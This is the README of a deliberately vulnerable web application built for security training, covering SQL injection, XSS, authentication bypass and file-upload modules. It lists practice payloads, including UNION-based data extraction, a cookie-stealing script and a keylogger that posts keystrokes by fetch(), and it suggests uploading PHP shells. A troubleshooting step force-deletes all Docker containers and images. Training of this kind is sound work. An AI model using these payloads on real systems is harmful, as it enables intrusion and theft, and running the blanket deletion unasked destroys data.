An intentionally vulnerable web application designed for security training, similar to DVWA but modular. Perfect for learning about web vulnerabilities in a safe, controlled environment.
FOR TRAINING AND EDUCATIONAL PURPOSES ONLY
- π« DO NOT deploy in production environments
- π« DO NOT expose to the internet
- π« DO NOT use with real/sensitive data
- β ONLY use in isolated, local environments
- β ONLY for legitimate security training
- Docker and Docker Compose installed
- Git installed
- At least 2GB free disk space
# Clone using HTTPS
git clone https://github.com/516hackers/516-hackers-vuln-playground.git
# Or using SSH
git clone git@github.com:516hackers/516-hackers-vuln-playground.git
# Navigate to project directory
cd 516-hackers-vuln-playground# Build and start all services
docker-compose up --build
# To run in background (detached mode)
docker-compose up -d --buildOpen your browser and navigate to:
http://localhost:3000
You should see the main dashboard with four vulnerability modules. The application comes pre-loaded with sample data.
516-hackers-vuln-playground/
βββ docker-compose.yml # Multi-container setup
βββ README.md # This file
βββ backend/
β βββ package.json # Node.js dependencies
β βββ server.js # Main Express server
β βββ Dockerfile # Backend container setup
β βββ routes/ # Vulnerability modules
β β βββ sqli.js # SQL Injection
β β βββ xss.js # Cross-site Scripting
β β βββ auth.js # Authentication Bypass
β β βββ file-upload.js # File Upload vulnerabilities
β βββ database/
β βββ init.sql # Database schema and sample data
βββ frontend/
β βββ index.html # Main interface
β βββ css/
β β βββ style.css # Styling
β βββ js/
β βββ app.js # Frontend logic
βββ scripts/
βββ test-sqli.js # SQLi testing scripts
βββ test-xss.js # XSS testing scripts
βββ test-auth.js # Auth testing scripts
Location: SQL Injection module in the web interface
Vulnerable Endpoint: /sqli/search
Practice Payloads:
-- Basic bypass
admin' OR '1'='1
-- Union attack
' UNION SELECT 1,2,3,4,5-- -
-- Database enumeration
' UNION SELECT version(),user(),database(),4,5-- -
-- Table extraction
' UNION SELECT table_name,2,3,4,5 FROM information_schema.tables-- -Learning Objectives:
- Understand how SQL injection works
- Learn to exploit authentication bypass
- Practice data extraction techniques
- Compare vulnerable vs secure code
Location: XSS module in the web interface
Vulnerable Endpoint: /xss/comment
Practice Payloads:
<!-- Basic alert -->
<script>alert('XSS')</script>
-- Image-based XSS
<img src=x onerror=alert(1)>
-- Cookie theft
<script>fetch('http://localhost:3000/steal?cookie='+document.cookie)</script>
-- Keylogger
<script>document.onkeypress=function(e){fetch('http://localhost:3000/log?key='+e.key)}</script>Learning Objectives:
- Understand reflected vs stored XSS
- Learn DOM-based XSS techniques
- Practice input sanitization methods
- Compare vulnerable vs secure implementations
Location: Authentication Bypass module
Vulnerable Endpoint: /auth/login-weak
Practice Techniques:
-- SQL injection in login
admin' OR '1'='1'-- -
-- Password field bypass
admin' OR '1'='1'-- -
-- Always true condition
' OR 1=1-- -Learning Objectives:
- Understand weak authentication mechanisms
- Learn session management vulnerabilities
- Practice privilege escalation
- Implement secure authentication
Location: File Upload module
Vulnerable Endpoint: /file-upload/insecure
Practice Uploads:
- PHP shell files
- Executable files with dangerous extensions
- Overwrite existing files
- Path traversal in filenames
Learning Objectives:
- Understand unrestricted file upload risks
- Learn file type validation
- Practice secure upload configurations
- Implement proper file sanitization
# Start services
docker-compose up
# Start in background
docker-compose up -d
# Stop services
docker-compose down
# Stop and remove volumes (reset data)
docker-compose down -v
# View logs
docker-compose logs
# View specific service logs
docker-compose logs web
docker-compose logs db# Access MySQL database
docker-compose exec db mysql -u root -p vuln_app
# Password: password
# Reset database
docker-compose down -v
docker-compose up -d# Access backend container
docker-compose exec web sh
# Install new dependencies
docker-compose exec web npm install <package>
# View application logs
docker-compose logs web -fRun automated tests to verify vulnerabilities:
# Test SQL Injection vulnerabilities
node scripts/test-sqli.js
# Test XSS vulnerabilities
node scripts/test-xss.js
# Test authentication bypass
node scripts/test-auth.js- Start with SQL Injection module
- Try basic payloads like
admin' OR '1'='1 - Understand how the vulnerable code works
- Compare with the secure version
- Practice advanced SQLi techniques
- Experiment with different XSS payloads
- Try authentication bypass methods
- Understand session management issues
- Chain multiple vulnerabilities
- Write custom exploit scripts
- Analyze the secure code implementations
- Propose additional security improvements
Each module includes both vulnerable and secure implementations:
- Vulnerable: String concatenation in queries
- Secure: Parameterized queries with prepared statements
- Vulnerable: Direct output without sanitization
- Secure: Input validation and output encoding
- Vulnerable: Plain text passwords, SQL in authentication
- Secure: Password hashing, parameterized queries, session management
- Vulnerable: No file type checking, original filenames
- Secure: Whitelist validation, safe filenames, size limits
Port already in use:
# Change ports in docker-compose.yml
ports:
- "3001:3000" # Use different host portDatabase connection issues:
# Reset everything
docker-compose down -v
docker-compose up --buildApplication not loading:
# Check if all services are running
docker-compose ps
# Check logs for errors
docker-compose logsFile uploads not working:
# Ensure upload directories exist
mkdir -p backend/uploads backend/secure-uploads
# Check directory permissions
chmod 755 backend/uploads backend/secure-uploads# Complete reset
docker-compose down -v
docker rm -f $(docker ps -aq)
docker rmi -f $(docker images -q)
docker-compose up --build- OWASP Top 10
- Web Application Security Testing methodologies
- Secure coding practices
- Penetration testing frameworks
- Try other vulnerable applications (DVWA, WebGoat, bWAPP)
- Practice on bug bounty platforms (with permission)
- Study secure coding guidelines
- Explore advanced exploitation techniques
We welcome contributions! Please:
- Fork the repository
- Create a feature branch
- Make your changes
- Add tests if applicable
- Submit a pull request
- Create new route file in
backend/routes/ - Add frontend interface in
frontend/ - Update navigation in
frontend/index.html - Add test scripts in
scripts/ - Update this README
This project is for educational purposes only. Use responsibly and only in environments you own or have explicit permission to test.
If you encounter issues:
- Check the troubleshooting section above
- Review Docker and system requirements
- Check the GitHub issues page
- Create a new issue with detailed information
Remember: With great power comes great responsibility. Use these skills ethically and legally! π‘οΈ
Created with β€οΈ by 516 Hackers for the security community